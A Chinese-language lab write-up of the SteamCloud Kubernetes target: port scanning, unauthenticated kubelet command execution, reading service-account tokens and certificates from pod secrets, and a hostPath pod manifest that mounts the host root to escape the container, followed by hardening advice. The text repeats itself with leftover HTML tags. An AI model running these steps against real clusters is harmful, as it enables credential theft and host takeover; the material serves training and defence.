Kubernetes安全渗透实战：SteamCloud靶机攻防详解<\/h1>

1. 靶机环境概述<\/h2>

SteamCloud是一个基于Kubernetes (k8s)环境的渗透测试靶机，主要考察对Kubernetes集群的安全评估和渗透能力。通过这个靶机，我们可以学习到：<\/p>

通过Pod挂载实现主机逃逸<\/li> <\/ul>

2. 信息收集阶段<\/h2>

2.1 端口扫描<\/h3>

使用Nmap进行全面扫描：<\/p>

nmap -p- -sV -sC 10.10.11.133
<\/span><\/span><\/code><\/pre>扫描结果摘要：<\/p>



端口<\/th>
服务<\/th>
版本\/备注<\/th>
<\/tr>
<\/thead>


22<\/td>
SSH<\/td>
OpenSSH 7.9p1 Debian 10+deb10u2<\/td>
<\/tr>

2379<\/td>
etcd-client<\/td>
SSL证书显示主机名steamcloud，有效期2025-02-25至2026-02-25<\/td>
<\/tr>

2380<\/td>
etcd-server<\/td>
同上<\/td>
<\/tr>

8443<\/td>
Kubernetes API<\/td>
显示为minikube环境，403 Forbidden响应<\/td>
<\/tr>

10249<\/td>
Kube-Proxy<\/td>
Golang net\/http server<\/td>
<\/tr>

10250<\/td>
Kubelet<\/td>
Golang net\/http server，SSL证书显示主机名steamcloud<\/td>
<\/tr>

10256<\/td>
Kube-Proxy Healthz<\/td>
Golang net\/http server<\/td>
<\/tr>
<\/tbody>
<\/table>
关键发现：<\/p>

8443端口的Kubernetes API拒绝匿名访问<\/li>
10250端口的Kubelet服务开放且未配置认证<\/li>
<\/ul>
2.2 Kubernetes服务识别<\/h3>
从扫描结果可以确认这是一个Kubernetes集群环境，主要组件包括：<\/p>

etcd (2379\/2380): Kubernetes的键值存储<\/li>
kube-apiserver (8443): 集群API入口<\/li>
kubelet (10250): 节点代理，管理Pod和容器<\/li>
kube-proxy (10249\/10256): 网络代理服务<\/li>
<\/ul>
3. Kubelet未授权访问漏洞利用<\/h2>
3.1 确认Kubelet未授权访问<\/h3>
Kubelet默认监听10250端口，如果配置不当可能允许未授权访问：<\/p>
curl -k https:\/\/10.10.11.133:10250\/pods | jq .
<\/span><\/span><\/code><\/pre>3.2 使用kubeletctl工具<\/h3>
kubeletctl<\/a>是专门用于与Kubelet交互的工具：<\/p>

列出所有Pod：<\/li>
<\/ol>
.\/kubeletctl_linux_amd64 pods --server 10.10.11.133
<\/span><\/span><\/code><\/pre>
扫描可执行RCE的Pod：<\/li>
<\/ol>
.\/kubeletctl_linux_amd64 --server 10.10.11.133 scan rce
<\/span><\/span><\/code><\/pre>
对特定Pod执行命令（如nginx）：<\/li>
<\/ol>
.\/kubeletctl_linux_amd64 --server 10.10.11.133 --pod nginx --container nginx exec "whoami"<\/span>
<\/span><\/span><\/code><\/pre>4. 获取服务账户凭证<\/h2>
4.1 提取Service Account Token<\/h3>
在可RCE的Pod中获取Kubernetes服务账户凭证：<\/p>
.\/kubeletctl_linux_amd64 --server 10.10.11.133 --pod nginx --container nginx exec "cat \/var\/run\/secrets\/kubernetes.io\/serviceaccount\/token"<\/span>
<\/span><\/span><\/code><\/pre>4.2 提取CA证书<\/h3>
.\/kubeletctl_linux_amd64 --server 10.10.11.133 --pod nginx --container nginx exec "cat \/var\/run\/secrets\/kubernetes.io\/serviceaccount\/ca.crt"<\/span>
<\/span><\/span><\/code><\/pre>4.3 设置环境变量<\/h3>
export token=<\/span>"eyJhbGciOiJSUzI1NiIsImtpZCI6InZzZzhFMUw4eTZNYks1UGZPVmNXSGtFWHFENEhQTl9HZS1EZW5DR2JnbVkifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxNzcxOTg2MjY0LCJpYXQiOjE3NDA0NTAyNjQsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJkZWZhdWx0IiwicG9kIjp7Im5hbWUiOiJuZ2lueCIsInVpZCI6ImUzMjA4NGRjLWFjNjAtNDFjNC04NjFhLTIxOGIyNGQxOTVhZiJ9LCJzZXJ2aWNlYWNjb3VudCI6eyJuYW1lIjoiZGVmYXVsdCIsInVpZCI6Ijg3MzYzZTA3LTQ1YWUtNDNlNC05NzA3LWFhMDY4MTlmMmU4ZCJ9LCJ3YXJuYWZ0ZXIiOjE3NDA0NTM4NzF9LCJuYmYiOjE3NDA0NTAyNjQsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDpkZWZhdWx0OmRlZmF1bHQifQ.Nz5JZBNDpL0tPsU_sRpfKexSrhZXgkB3kdVx72v6efSfXDuwlBnRcKHcEnFyAKN1DAtAkL49qlFRbnPLAlOHAn0Gz0iu9_k_qe8VY-lBiVLe2WDefZhe5VlprQXg3ufgu8DVkD6-xOChsaqaouFVyJhNQvyFPKipknpomTk0mX5h-cRrhPERKD1A9hcF1zDoOVjKcfqAZn8cNbQ9NYc5ywD5uXXFa0P7Qw5ETJeXwTS8KGW4JbLidoSS05JAezNL5-iV6ZqS6uALSIzioEBub9oJdQkqbjPeMI5wRe-iG9S5hvwVrc6__4L29kw-Xoi42pbt6QbuIjuLra01yQgoDQ"<\/span>
<\/span><\/span><\/code><\/pre>5. 权限评估与提升<\/h2>
5.1 检查当前权限<\/h3>
kubectl --token=<\/span>$token --certificate-authority=<\/span>ca.crt --server=<\/span>https:\/\/10.10.11.133:8443 auth can-i --list
<\/span><\/span><\/code><\/pre>5.2 创建特权Pod实现主机逃逸<\/h3>
如果具有创建Pod的权限，可以创建挂载主机根目录的特权Pod：<\/p>

创建恶意Pod定义文件nginxt.yaml<\/code>：<\/li>
<\/ol>
apiVersion<\/span>: v1<\/span>
<\/span><\/span>kind<\/span>: Pod<\/span>
<\/span><\/span>metadata<\/span>:
<\/span><\/span>  name<\/span>: nginxt<\/span>
<\/span><\/span>  namespace<\/span>: default<\/span>
<\/span><\/span>spec<\/span>:
<\/span><\/span>  containers<\/span>:
<\/span><\/span>  - name<\/span>: nginxt<\/span>
<\/span><\/span>    image<\/span>: nginx:1.14.2<\/span>
<\/span><\/span>    volumeMounts<\/span>:
<\/span><\/span>    - mountPath<\/span>: \/root<\/span>
<\/span><\/span>      name<\/span>: mount-root-into-mnt<\/span>
<\/span><\/span>  volumes<\/span>:
<\/span><\/span>  - name<\/span>: mount-root-into-mnt<\/span>
<\/span><\/span>    hostPath<\/span>:
<\/span><\/span>      path<\/span>: \/<\/span>
<\/span><\/span>  automountServiceAccountToken<\/span>: true<\/span>
<\/span><\/span>  hostNetwork<\/span>: true<\/span>
<\/span><\/span><\/code><\/pre>
应用Pod配置：<\/li>
<\/ol>
kubectl --token=<\/span>$token --certificate-authority=<\/span>ca.crt --server=<\/span>https:\/\/10.10.11.133:8443 apply -f nginxt.yaml
<\/span><\/span><\/code><\/pre>
通过kubeletctl执行命令读取主机文件：<\/li>
<\/ol>
kubeletctl --server 10.10.11.133 exec "cat \/root\/home\/user\/user.txt"<\/span> -p nginxt -c nginxt
<\/span><\/span><\/code><\/pre>6. 防御措施<\/h2>
基于此攻击路径，管理员应采取以下防御措施：<\/p>


Kubelet安全配置<\/strong>：<\/p>

启用Kubelet认证（--anonymous-auth=false）<\/li>
配置适当的授权模式（--authorization-mode=Webhook）<\/li>
<\/ul>
<\/li>

RBAC最小权限原则<\/strong>：<\/p>

限制Service Account权限<\/li>
避免使用cluster-admin等过高权限<\/li>
<\/ul>
<\/li>

Pod安全策略<\/strong>：<\/p>

限制特权容器（allowPrivilegeEscalation: false）<\/li>
限制hostPath挂载<\/li>
限制hostNetwork使用<\/li>
<\/ul>
<\/li>

网络隔离<\/strong>：<\/p>

使用NetworkPolicy限制Pod间通信<\/li>
避免Kubelet API直接暴露在公网<\/li>
<\/ul>
<\/li>

审计与监控<\/strong>：<\/p>

监控异常的Pod创建行为<\/li>
审计Kubelet API访问日志<\/li>
<\/ul>
<\/li>
<\/ol>
7. 总结<\/h2>
通过SteamCloud靶机，我们学习了完整的Kubernetes集群渗透路径：<\/p>

通过信息收集发现Kubelet未授权访问漏洞<\/li>
利用漏洞获取Pod内服务账户凭证<\/li>
评估当前服务账户权限<\/li>
通过创建特权Pod实现主机逃逸<\/li>
最终获取主机敏感信息<\/li>
<\/ol>
这个案例展示了Kubernetes环境中配置不当可能带来的严重安全风险，强调了安全配置和最小权限原则的重要性。<\/p>

端口<\/th>	服务<\/th>	版本\/备注<\/th> <\/tr> <\/thead>
22<\/td>	SSH<\/td>	OpenSSH 7.9p1 Debian 10+deb10u2<\/td> <\/tr>
2379<\/td>	etcd-client<\/td>	SSL证书显示主机名steamcloud，有效期2025-02-25至2026-02-25<\/td> <\/tr>
2380<\/td>	etcd-server<\/td>	同上<\/td> <\/tr>
8443<\/td>	Kubernetes API<\/td>	显示为minikube环境，403 Forbidden响应<\/td> <\/tr>
10249<\/td>	Kube-Proxy<\/td>	Golang net\/http server<\/td> <\/tr>
10250<\/td>	Kubelet<\/td>	Golang net\/http server，SSL证书显示主机名steamcloud<\/td> <\/tr>
10256<\/td>	Kube-Proxy Healthz<\/td>	Golang net\/http server<\/td> <\/tr> <\/tbody> <\/table> 关键发现：<\/p> 8443端口的Kubernetes API拒绝匿名访问<\/li> 10250端口的Kubelet服务开放且未配置认证<\/li> <\/ul> 2.2 Kubernetes服务识别<\/h3> 从扫描结果可以确认这是一个Kubernetes集群环境，主要组件包括：<\/p> etcd (2379\/2380): Kubernetes的键值存储<\/li> kube-apiserver (8443): 集群API入口<\/li> kubelet (10250): 节点代理，管理Pod和容器<\/li> kube-proxy (10249\/10256): 网络代理服务<\/li> <\/ul> 3. Kubelet未授权访问漏洞利用<\/h2> 3.1 确认Kubelet未授权访问<\/h3> Kubelet默认监听10250端口，如果配置不当可能允许未授权访问：<\/p> curl -k https:\/\/10.10.11.133:10250\/pods \| jq . <\/span><\/span><\/code><\/pre>3.2 使用kubeletctl工具<\/h3> kubeletctl<\/a>是专门用于与Kubelet交互的工具：<\/p> 列出所有Pod：<\/li> <\/ol> .\/kubeletctl_linux_amd64 pods --server 10.10.11.133 <\/span><\/span><\/code><\/pre> 扫描可执行RCE的Pod：<\/li> <\/ol> .\/kubeletctl_linux_amd64 --server 10.10.11.133 scan rce <\/span><\/span><\/code><\/pre> 对特定Pod执行命令（如nginx）：<\/li> <\/ol> .\/kubeletctl_linux_amd64 --server 10.10.11.133 --pod nginx --container nginx exec "whoami"<\/span> <\/span><\/span><\/code><\/pre>4. 获取服务账户凭证<\/h2> 4.1 提取Service Account Token<\/h3> 在可RCE的Pod中获取Kubernetes服务账户凭证：<\/p> .\/kubeletctl_linux_amd64 --server 10.10.11.133 --pod nginx --container nginx exec "cat \/var\/run\/secrets\/kubernetes.io\/serviceaccount\/token"<\/span> <\/span><\/span><\/code><\/pre>4.2 提取CA证书<\/h3> .\/kubeletctl_linux_amd64 --server 10.10.11.133 --pod nginx --container nginx exec "cat \/var\/run\/secrets\/kubernetes.io\/serviceaccount\/ca.crt"<\/span> <\/span><\/span><\/code><\/pre>4.3 设置环境变量<\/h3> export token=<\/span>"eyJhbGciOiJSUzI1NiIsImtpZCI6InZzZzhFMUw4eTZNYks1UGZPVmNXSGtFWHFENEhQTl9HZS1EZW5DR2JnbVkifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxNzcxOTg2MjY0LCJpYXQiOjE3NDA0NTAyNjQsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJkZWZhdWx0IiwicG9kIjp7Im5hbWUiOiJuZ2lueCIsInVpZCI6ImUzMjA4NGRjLWFjNjAtNDFjNC04NjFhLTIxOGIyNGQxOTVhZiJ9LCJzZXJ2aWNlYWNjb3VudCI6eyJuYW1lIjoiZGVmYXVsdCIsInVpZCI6Ijg3MzYzZTA3LTQ1YWUtNDNlNC05NzA3LWFhMDY4MTlmMmU4ZCJ9LCJ3YXJuYWZ0ZXIiOjE3NDA0NTM4NzF9LCJuYmYiOjE3NDA0NTAyNjQsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDpkZWZhdWx0OmRlZmF1bHQifQ.Nz5JZBNDpL0tPsU_sRpfKexSrhZXgkB3kdVx72v6efSfXDuwlBnRcKHcEnFyAKN1DAtAkL49qlFRbnPLAlOHAn0Gz0iu9_k_qe8VY-lBiVLe2WDefZhe5VlprQXg3ufgu8DVkD6-xOChsaqaouFVyJhNQvyFPKipknpomTk0mX5h-cRrhPERKD1A9hcF1zDoOVjKcfqAZn8cNbQ9NYc5ywD5uXXFa0P7Qw5ETJeXwTS8KGW4JbLidoSS05JAezNL5-iV6ZqS6uALSIzioEBub9oJdQkqbjPeMI5wRe-iG9S5hvwVrc6__4L29kw-Xoi42pbt6QbuIjuLra01yQgoDQ"<\/span> <\/span><\/span><\/code><\/pre>5. 权限评估与提升<\/h2> 5.1 检查当前权限<\/h3> kubectl --token=<\/span>$token --certificate-authority=<\/span>ca.crt --server=<\/span>https:\/\/10.10.11.133:8443 auth can-i --list <\/span><\/span><\/code><\/pre>5.2 创建特权Pod实现主机逃逸<\/h3> 如果具有创建Pod的权限，可以创建挂载主机根目录的特权Pod：<\/p> 创建恶意Pod定义文件nginxt.yaml<\/code>：<\/li> <\/ol> apiVersion<\/span>: v1<\/span> <\/span><\/span>kind<\/span>: Pod<\/span> <\/span><\/span>metadata<\/span>: <\/span><\/span> name<\/span>: nginxt<\/span> <\/span><\/span> namespace<\/span>: default<\/span> <\/span><\/span>spec<\/span>: <\/span><\/span> containers<\/span>: <\/span><\/span> - name<\/span>: nginxt<\/span> <\/span><\/span> image<\/span>: nginx:1.14.2<\/span> <\/span><\/span> volumeMounts<\/span>: <\/span><\/span> - mountPath<\/span>: \/root<\/span> <\/span><\/span> name<\/span>: mount-root-into-mnt<\/span> <\/span><\/span> volumes<\/span>: <\/span><\/span> - name<\/span>: mount-root-into-mnt<\/span> <\/span><\/span> hostPath<\/span>: <\/span><\/span> path<\/span>: \/<\/span> <\/span><\/span> automountServiceAccountToken<\/span>: true<\/span> <\/span><\/span> hostNetwork<\/span>: true<\/span> <\/span><\/span><\/code><\/pre> 应用Pod配置：<\/li> <\/ol> kubectl --token=<\/span>$token --certificate-authority=<\/span>ca.crt --server=<\/span>https:\/\/10.10.11.133:8443 apply -f nginxt.yaml <\/span><\/span><\/code><\/pre> 通过kubeletctl执行命令读取主机文件：<\/li> <\/ol> kubeletctl --server 10.10.11.133 exec "cat \/root\/home\/user\/user.txt"<\/span> -p nginxt -c nginxt <\/span><\/span><\/code><\/pre>6. 防御措施<\/h2> 基于此攻击路径，管理员应采取以下防御措施：<\/p> Kubelet安全配置<\/strong>：<\/p> 启用Kubelet认证（--anonymous-auth=false）<\/li> 配置适当的授权模式（--authorization-mode=Webhook）<\/li> <\/ul> <\/li> RBAC最小权限原则<\/strong>：<\/p> 限制Service Account权限<\/li> 避免使用cluster-admin等过高权限<\/li> <\/ul> <\/li> Pod安全策略<\/strong>：<\/p> 限制特权容器（allowPrivilegeEscalation: false）<\/li> 限制hostPath挂载<\/li> 限制hostNetwork使用<\/li> <\/ul> <\/li> 网络隔离<\/strong>：<\/p> 使用NetworkPolicy限制Pod间通信<\/li> 避免Kubelet API直接暴露在公网<\/li> <\/ul> <\/li> 审计与监控<\/strong>：<\/p> 监控异常的Pod创建行为<\/li> 审计Kubelet API访问日志<\/li> <\/ul> <\/li> <\/ol> 7. 总结<\/h2> 通过SteamCloud靶机，我们学习了完整的Kubernetes集群渗透路径：<\/p> 通过信息收集发现Kubelet未授权访问漏洞<\/li> 利用漏洞获取Pod内服务账户凭证<\/li> 评估当前服务账户权限<\/li> 通过创建特权Pod实现主机逃逸<\/li> 最终获取主机敏感信息<\/li> <\/ol> 这个案例展示了Kubernetes环境中配置不当可能带来的严重安全风险，强调了安全配置和最小权限原则的重要性。<\/p>